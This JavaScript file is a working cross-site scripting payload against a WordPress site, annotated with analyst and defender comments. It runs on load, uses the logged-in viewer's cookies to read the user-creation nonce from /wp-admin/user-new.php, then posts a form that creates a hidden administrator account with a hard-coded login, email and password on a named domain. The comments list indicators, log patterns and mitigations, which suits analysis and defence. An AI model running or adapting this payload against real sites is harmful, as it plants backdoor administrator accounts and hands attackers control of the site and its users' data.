/**
 * Requests `url` with the browser's stored credentials, parses the response as
 * HTML, and hands the `value` of the element whose id is `csrf_token_id` to `func`.
 *
 * Security context (for analysts): this is the token-harvesting half of a
 * script-driven request forgery. An anti-CSRF nonce embedded in a page is
 * readable by any script running on that page's origin, so the nonce stops
 * cross-site form posts but not script injected into the site itself.
 * NOTE(review): reading `responseText` from a credentialed request normally
 * requires the script to run same-origin with `url` (or a permissive CORS
 * policy), so this presumably depends on a script-injection flaw such as
 * stored/reflected XSS; confirm the entry point during triage.
 *
 * @param {string} url - Page that contains the hidden token field.
 * @param {string} csrf_token_id - DOM id of the input holding the token.
 * @param {function(string): void} func - Callback invoked with the token value.
 */
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
// Only act on a completed request that returned HTTP 200.
if(this.readyState == 4 && this.status == 200){
// Parse into a detached document so the token field can be looked up by id.
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}
};
xhr.open("GET", url, true);
// Send the victim's session cookies, so the page is rendered for the logged-in user.
xhr.withCredentials = true;
xhr.send();
}
/**
 * Submits the WordPress "Add New User" form (`action=createuser`) with the
 * supplied nonce, asking for an account with `role=administrator`.
 *
 * Defender notes:
 * - The request carries the browser's session cookies (`withCredentials`), so
 *   it can only succeed when the person viewing the page is logged in with
 *   rights to create users.
 * - Indicators hard-coded in the request body: `user_login=adminpeler`,
 *   `email=admin@peler.com`, `url=peler.com`. Search the user table and mail
 *   logs for these values.
 * - Log pattern: a GET of /wp-admin/user-new.php immediately followed by a
 *   POST to the same path from the same session, without the normal admin
 *   page navigation around it.
 * - Mitigation: remove the script-injection flaw that let this code run,
 *   audit all administrator accounts, rotate credentials and sessions for
 *   existing administrators, and consider a Content-Security-Policy that
 *   disallows inline/untrusted script in the admin area.
 *
 * @param {string} token - Value of the `_wpnonce_create-user` field.
 */
function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","https://www.xqblog.com/wp-admin/user-new.php", true);
// Attach the viewer's cookies; the server sees an authenticated admin request.
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// Form body mirrors the fields of the user-creation form; the nonce is concatenated in as-is.
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=adminpeler&email=admin@peler.com&first_name=Peler&last_name=Peler&url=peler.com&pass1=Pelerlu123&pass2=Pelerlu123&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}
// Runs as soon as the script is evaluated: fetch the user-creation page, read its
// `_wpnonce_create-user` field, then pass that nonce to addAdmin. No user
// interaction is involved, so the only visible trace is the pair of requests to
// /wp-admin/user-new.php and the resulting new account.
getCSRFToken("https://www.xqblog.com/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);